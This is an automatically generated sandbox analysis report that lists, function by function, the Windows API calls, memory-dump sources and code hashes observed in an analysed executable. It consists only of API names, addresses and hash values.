                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                        • String ID:
                                        • API String ID: 1120388591-0
                                        • Opcode ID: 0af5a23b3f2e46646ddcbc5941559dff8663ad42b2d095927cc1ef64c95306e7
                                        • Instruction ID: 8c11c272916bc4555d70427098dc69ae47a57eb09deb99a446c3b98ec17b28b9
                                        • Opcode Fuzzy Hash: 0af5a23b3f2e46646ddcbc5941559dff8663ad42b2d095927cc1ef64c95306e7
                                        • Instruction Fuzzy Hash: 2B818F70208241AFD714DF24C895F2ABBE5FF84348F14859CF5598B2A2DB31ED49CB92
                                        APIs
                                        • VariantInit.OLEAUT32(00000035), ref: 00C4F7B9
                                        • SysAllocString.OLEAUT32(00000001), ref: 00C4F860
                                        • VariantCopy.OLEAUT32(00C4FA64,00000000), ref: 00C4F889
                                        • VariantClear.OLEAUT32(00C4FA64), ref: 00C4F8AD
                                        • VariantCopy.OLEAUT32(00C4FA64,00000000), ref: 00C4F8B1
                                        • VariantClear.OLEAUT32(?), ref: 00C4F8BB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCopy$AllocInitString
                                        • String ID:
                                        • API String ID: 3859894641-0
                                        • Opcode ID: 951e95d307885e4101dd46f23f1234752b05a3909ac09cd2d85ee0215cf27192
                                        • Instruction ID: f61adc73db6c09ca2759392a20d8f2ee0bb921a9afdfd26877629ff4c3b9353b
                                        • Opcode Fuzzy Hash: 951e95d307885e4101dd46f23f1234752b05a3909ac09cd2d85ee0215cf27192
                                        • Instruction Fuzzy Hash: 6051B331A00314AADF24AF66D895B39B3E4FF55310B24946EED06DF292DB708C42D7A6
                                        APIs
                                          • Part of subcall function 00BF7620: _wcslen.LIBCMT ref: 00BF7625
                                          • Part of subcall function 00BF6B57: _wcslen.LIBCMT ref: 00BF6B6A
                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00C694E5
                                        • _wcslen.LIBCMT ref: 00C69506
                                        • _wcslen.LIBCMT ref: 00C6952D
                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00C69585
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$FileName$OpenSave
                                        • String ID: X
                                        • API String ID: 83654149-3081909835
                                        • Opcode ID: f99c621079510aa80d2c9565f0b44102787cedd11566d4c49721357226fb36ae
                                        • Instruction ID: cac7ad7d5b691bcef74a84442aeaeeca73589f23c640a7f466a7d87913d2e51c
                                        • Opcode Fuzzy Hash: f99c621079510aa80d2c9565f0b44102787cedd11566d4c49721357226fb36ae
                                        • Instruction Fuzzy Hash: 44E18F71508340DFC724EF24C891A6AB7E4FF85314F0489ADF9999B2A2DB31DD49CB92
                                        APIs
                                          • Part of subcall function 00C09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C09BB2
                                        • BeginPaint.USER32(?,?,?), ref: 00C09241
                                        • GetWindowRect.USER32(?,?), ref: 00C092A5
                                        • ScreenToClient.USER32(?,?), ref: 00C092C2
                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C092D3
                                        • EndPaint.USER32(?,?,?,?,?), ref: 00C09321
                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00C471EA
                                          • Part of subcall function 00C09339: BeginPath.GDI32(00000000), ref: 00C09357
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                        • String ID:
                                        • API String ID: 3050599898-0
                                        • Opcode ID: 1393b1e5ee55cfac42ef62132175b39dee183b32075338a12b0701b887e9527b
                                        • Instruction ID: 5059493560ecd64a24569d99dd1e91742bf10b5eef073d0ba0c53db7af552b30
                                        • Opcode Fuzzy Hash: 1393b1e5ee55cfac42ef62132175b39dee183b32075338a12b0701b887e9527b
                                        • Instruction Fuzzy Hash: BC418B71108200AFD721DF25DCC8FAE7BB8EB4A720F140669F9A5872F2C7719945DB61
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C6080C
                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00C60847
                                        • EnterCriticalSection.KERNEL32(?), ref: 00C60863
                                        • LeaveCriticalSection.KERNEL32(?), ref: 00C608DC
                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C608F3
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C60921
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                        • String ID:
                                        • API String ID: 3368777196-0
                                        • Opcode ID: 2f243e66759b5d983d0882449e2f166c4cfc106f4248c0add19d213e855000df
                                        • Instruction ID: 9fdaf85efc4113471bf145f7f5160714b88aed407b8f66669089d6d028c15ba2
                                        • Opcode Fuzzy Hash: 2f243e66759b5d983d0882449e2f166c4cfc106f4248c0add19d213e855000df
                                        • Instruction Fuzzy Hash: F7416871900205EBDF24EF54DCC5AAA77B9FF44710F2440A9ED00AA297DB30DEA5DBA4
                                        APIs
                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00C4F3AB,00000000,?,?,00000000,?,00C4682C,00000004,00000000,00000000), ref: 00C8824C
                                        • EnableWindow.USER32(00000000,00000000), ref: 00C88272
                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00C882D1
                                        • ShowWindow.USER32(00000000,00000004), ref: 00C882E5
                                        • EnableWindow.USER32(00000000,00000001), ref: 00C8830B
                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00C8832F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$Show$Enable$MessageSend
                                        • String ID:
                                        • API String ID: 642888154-0
                                        • Opcode ID: 99d6e20aaacd51918be0423b8cd6890a539aaef6d8bcc533973a89f49f17b52d
                                        • Instruction ID: 59ec95cdd1e71be81207d02a240f3bc0ab9edfd94d3daef2334dace2a8230165
                                        • Opcode Fuzzy Hash: 99d6e20aaacd51918be0423b8cd6890a539aaef6d8bcc533973a89f49f17b52d
                                        • Instruction Fuzzy Hash: 8441D674601640AFDF22EF15C895FE87BE0BB06718F580168F9188B673CB31A949CB58
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00C54C95
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C54CB2
                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C54CEA
                                        • _wcslen.LIBCMT ref: 00C54D08
                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C54D10
                                        • _wcsstr.LIBVCRUNTIME ref: 00C54D1A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                        • String ID:
                                        • API String ID: 72514467-0
                                        • Opcode ID: bb0eb6f3eb9ac5bb3fcec439d50a19e3578640fb9b227104b556be9561979e86
                                        • Instruction ID: 3cd7fa926e08c63d92cf99e364f08087ce79fc3d84edff85b38ec53667d5e7b2
                                        • Opcode Fuzzy Hash: bb0eb6f3eb9ac5bb3fcec439d50a19e3578640fb9b227104b556be9561979e86
                                        • Instruction Fuzzy Hash: 6221D436204200BBEB299B2AEC49F7F7BACDF45755F108039FC05CA191EA61DDC5A7A4
                                        APIs
                                          • Part of subcall function 00BF3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF3A97,?,?,00BF2E7F,?,?,?,00000000), ref: 00BF3AC2
                                        • _wcslen.LIBCMT ref: 00C6587B
                                        • CoInitialize.OLE32(00000000), ref: 00C65995
                                        • CoCreateInstance.OLE32(00C8FCF8,00000000,00000001,00C8FB68,?), ref: 00C659AE
                                        • CoUninitialize.OLE32 ref: 00C659CC
                                        Strings
                                         Memory Dump Source
                                         • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                         Joe Sandbox IDA Plugin
                                         • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 3172280962-24824748
                                        APIs
                                          • Part of subcall function 00C50FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C50FCA
                                          • Part of subcall function 00C50FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C50FD6
                                          • Part of subcall function 00C50FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C50FE5
                                          • Part of subcall function 00C50FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C50FEC
                                          • Part of subcall function 00C50FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C51002
                                        • GetLengthSid.ADVAPI32(?,00000000,00C51335), ref: 00C517AE
                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C517BA
                                        • HeapAlloc.KERNEL32(00000000), ref: 00C517C1
                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C517DA
                                        • GetProcessHeap.KERNEL32(00000000,00000000,00C51335), ref: 00C517EE
                                        • HeapFree.KERNEL32(00000000), ref: 00C517F5
                                        Similarity
                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                        • String ID:
                                        • API String ID: 3008561057-0
                                        APIs
                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C514FF
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00C51506
                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C51515
                                        • CloseHandle.KERNEL32(00000004), ref: 00C51520
                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C5154F
                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C51563
                                        Similarity
                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                        • String ID:
                                        • API String ID: 1413079979-0
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00C13379,00C12FE5), ref: 00C13390
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C1339E
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C133B7
                                        • SetLastError.KERNEL32(00000000,?,00C13379,00C12FE5), ref: 00C13409
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00C25686,00C33CD6,?,00000000,?,00C25B6A,?,?,?,?,?,00C1E6D1,?,00CB8A48), ref: 00C22D78
                                        • _free.LIBCMT ref: 00C22DAB
                                        • _free.LIBCMT ref: 00C22DD3
                                        • SetLastError.KERNEL32(00000000,?,?,?,?,00C1E6D1,?,00CB8A48,00000010,00BF4F4A,?,?,00000000,00C33CD6), ref: 00C22DE0
                                        • SetLastError.KERNEL32(00000000,?,?,?,?,00C1E6D1,?,00CB8A48,00000010,00BF4F4A,?,?,00000000,00C33CD6), ref: 00C22DEC
                                        • _abort.LIBCMT ref: 00C22DF2
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        APIs
                                          • Part of subcall function 00C09639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C09693
                                          • Part of subcall function 00C09639: SelectObject.GDI32(?,00000000), ref: 00C096A2
                                          • Part of subcall function 00C09639: BeginPath.GDI32(?), ref: 00C096B9
                                          • Part of subcall function 00C09639: SelectObject.GDI32(?,00000000), ref: 00C096E2
                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00C88A4E
                                        • LineTo.GDI32(?,00000003,00000000), ref: 00C88A62
                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00C88A70
                                        • LineTo.GDI32(?,00000000,00000003), ref: 00C88A80
                                        • EndPath.GDI32(?), ref: 00C88A90
                                        • StrokePath.GDI32(?), ref: 00C88AA0
                                        Similarity
                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                        • String ID:
                                        • API String ID: 43455801-0
                                        APIs
                                        • GetDC.USER32(00000000), ref: 00C55218
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C55229
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C55230
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00C55238
                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C5524F
                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00C55261
                                        Similarity
                                        • API ID: CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1035833867-0
                                        APIs
                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BF1BF4
                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00BF1BFC
                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BF1C07
                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BF1C12
                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00BF1C1A
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BF1C22
                                        Similarity
                                        • API ID: Virtual
                                        • String ID:
                                        • API String ID: 4278518827-0
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C5EB30
                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C5EB46
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00C5EB55
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C5EB64
                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C5EB6E
                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C5EB75
                                        Similarity
                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                        • String ID:
                                        • API String ID: 839392675-0
                                        APIs
                                        • GetClientRect.USER32(?), ref: 00C47452
                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00C47469
                                        • GetWindowDC.USER32(?), ref: 00C47475
                                        • GetPixel.GDI32(00000000,?,?), ref: 00C47484
                                        • ReleaseDC.USER32(?,00000000), ref: 00C47496
                                        • GetSysColor.USER32(00000005), ref: 00C474B0
                                        Similarity
                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                        • String ID:
                                        • API String ID: 272304278-0
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C5187F
                                        • UnloadUserProfile.USERENV(?,?), ref: 00C5188B
                                        • CloseHandle.KERNEL32(?), ref: 00C51894
                                        • CloseHandle.KERNEL32(?), ref: 00C5189C
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C518A5
                                        • HeapFree.KERNEL32(00000000), ref: 00C518AC
                                        Similarity
                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                        • String ID:
                                        • API String ID: 146765662-0
                                        APIs
                                          • Part of subcall function 00BF7620: _wcslen.LIBCMT ref: 00BF7625
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C5C6EE
                                        • _wcslen.LIBCMT ref: 00C5C735
                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C5C79C
                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C5C7CA
                                        Strings
                                        Similarity
                                        • API ID: ItemMenu$Info_wcslen$Default
                                        • String ID: 0
                                        • API String ID: 1227352736-4108050209
                                        APIs
                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00C7AEA3
                                          • Part of subcall function 00BF7620: _wcslen.LIBCMT ref: 00BF7625
                                        • GetProcessId.KERNEL32(00000000), ref: 00C7AF38
                                        • CloseHandle.KERNEL32(00000000), ref: 00C7AF67
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                        • String ID: <$@
                                        • API String ID: 146682121-1426351568
                                        • Opcode ID: f0d74349ccd005ba824694084c8898dd981161cba783de0c8c25993597277b5b
                                        • Instruction ID: 10ede9cc81e9fcb2467b77928a9252a53e58b85c56d8d86784f87983a9988a4b
                                        • Opcode Fuzzy Hash: f0d74349ccd005ba824694084c8898dd981161cba783de0c8c25993597277b5b
                                        • Instruction Fuzzy Hash: 64716175A00619DFCB14DF54C495A9EBBF0FF48314F048499E81AAB361CB74ED45CB91
                                        APIs
                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C57206
                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C5723C
                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C5724D
                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C572CF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                        • String ID: DllGetClassObject
                                        • API String ID: 753597075-1075368562
                                        • Opcode ID: 1adc2a002b4e294180ff11d97d356462ee340cfd1f98bf24fa9265adc256e657
                                        • Instruction ID: a2868c564587c0d9233fd791a826679bf2a4bb205b894d70e62c8cedf3584b1b
                                        • Opcode Fuzzy Hash: 1adc2a002b4e294180ff11d97d356462ee340cfd1f98bf24fa9265adc256e657
                                        • Instruction Fuzzy Hash: 2C416EB5604204EFDB15CF54DC88B9A7BA9EF44311F1481A9BD059F20AD7B0DAC9CBA4
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C83E35
                                        • IsMenu.USER32(?), ref: 00C83E4A
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C83E92
                                        • DrawMenuBar.USER32 ref: 00C83EA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Menu$Item$DrawInfoInsert
                                        • String ID: 0
                                        • API String ID: 3076010158-4108050209
                                        • Opcode ID: 444ec26e78230d7aaf2b8698512a7fde3248854a03e7392710314c1bfae8d485
                                        • Instruction ID: 0d47ab1bafbeebac2d11fff39345a3cd82e097d57fa6d56e3f24e3a6bb822939
                                        • Opcode Fuzzy Hash: 444ec26e78230d7aaf2b8698512a7fde3248854a03e7392710314c1bfae8d485
                                        • Instruction Fuzzy Hash: B0416775A00249AFDF10EF50D884EAABBB9FF4A768F044029E915A7250D730AE44DF64
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C53CCA
                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C51E66
                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C51E79
                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C51EA9
                                          • Part of subcall function 00BF6B57: _wcslen.LIBCMT ref: 00BF6B6A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$_wcslen$ClassName
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 2081771294-1403004172
                                        • Opcode ID: 5982d3363973c2817e5b4dbcf014ea9c6b18ea1de79f868f4bfeb164cd2822c7
                                        • Instruction ID: d7271e9efdfe3dea41070c758eb33437fe9a3d29581472caa55918b14c93e740
                                        • Opcode Fuzzy Hash: 5982d3363973c2817e5b4dbcf014ea9c6b18ea1de79f868f4bfeb164cd2822c7
                                        • Instruction Fuzzy Hash: D4213775A00108BADB14AB61CC8EEFFB7B9DF41390B144129FD21A31E1DB744E8ED624
                                        APIs
                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C82F8D
                                        • LoadLibraryW.KERNEL32(?), ref: 00C82F94
                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C82FA9
                                        • DestroyWindow.USER32(?), ref: 00C82FB1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
